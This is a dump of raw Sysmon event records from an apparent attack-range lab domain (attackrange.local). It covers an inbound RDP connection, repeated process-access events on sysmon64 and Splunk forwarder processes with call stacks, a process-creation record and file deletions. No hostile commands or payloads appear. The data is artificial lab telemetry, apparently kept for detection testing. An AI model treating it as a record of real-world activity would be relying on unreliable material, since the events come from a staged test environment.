354300x8000000000000000807225Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:50:25.291{0C1E0330-0490-60E8-0F00-00000000D001}944C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse122.226.223.195-50692-false10.0.1.15win-host-623.attackrange.local3389ms-wbt-server 10341000x8000000000000000807224Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:50:26.091{0C1E0330-050B-60E8-A000-00000000D001}35321936C:\Windows\system32\conhost.exe{0C1E0330-F442-60EB-6879-00000000D001}3952C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000807223Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:50:26.091{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000807222Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:50:26.091{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000807221Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:50:26.091{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000807220Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:50:26.075{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000807219Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:50:26.075{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000807218Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:50:26.075{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000807217Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:50:26.075{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000807216Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:50:26.075{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000807215Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:50:26.075{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000807214Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:50:26.075{0C1E0330-048F-60E8-0500-00000000D001}412996C:\Windows\system32\csrss.exe{0C1E0330-F442-60EB-6879-00000000D001}3952C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x8000000000000000807213Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:50:26.075{0C1E0330-050B-60E8-9B00-00000000D001}10203368C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{0C1E0330-F442-60EB-6879-00000000D001}3952C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x8000000000000000807212Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:50:26.076{0C1E0330-F442-60EB-6879-00000000D001}3952C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe10.0.10011.16384SplunkMonNoHandle Control ProgramWindows (R) Win 7 DDK driverWindows (R) Win 7 DDK providerSplunkMonNoHandle.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{0C1E0330-048F-60E8-E703-000000000000}0x3e70SystemMD5=BF28C74E12839E40CD89696C7CB01573,SHA256=6187325F302F232DE582FE28E0E0D2B292AB8122C3356C9CE295A482D7B93EA3,IMPHASH=27776F2813155A6CF34F6A075A0C2EC8{0C1E0330-050B-60E8-9B00-00000000D001}1020C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000807257Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:50:27.997{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=3A452A31E87D2F6CE93825ECF4B085FE,SHA256=FF8B0111AD3F5ED5AE35EC6F1A979E7C6B16350916DD188BCFF2023E5FD86E7A,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001048006Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:50:27.150{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E78219CE3B050DDD592BB1E3E5BFDEFA,SHA256=FAEE751C763C04C668100C74416DB557030CCB82EC1B32829D28DD17258DBC89,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000807256Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:50:27.638{0C1E0330-F443-60EB-6A79-00000000D001}1640416C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{0C1E0330-050B-60E8-9B00-00000000D001}1020C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x8000000000000000807255Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:50:27.591{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=1EEE0DA56ED8E1A1686BC738466EA06B,SHA256=3A21864CF870FE8D7CB3BF729F2C026126D7EFB62D2F5AE6955679935E2F88FF,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000807254Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:50:27.450{0C1E0330-050B-60E8-A000-00000000D001}35321936C:\Windows\system32\conhost.exe{0C1E0330-F443-60EB-6A79-00000000D001}1640C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000807253Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:50:27.450{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000807252Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:50:27.450{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000807251Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:50:27.450{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000807250Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:50:27.450{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000807249Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:50:27.450{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000807248Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:50:27.450{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000807247Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:50:27.450{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000807246Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:50:27.450{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000807245Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:50:27.450{0C1E0330-048F-60E8-0500-00000000D001}412528C:\Windows\system32\csrss.exe{0C1E0330-F443-60EB-6A79-00000000D001}1640C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x8000000000000000807244Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:50:27.450{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 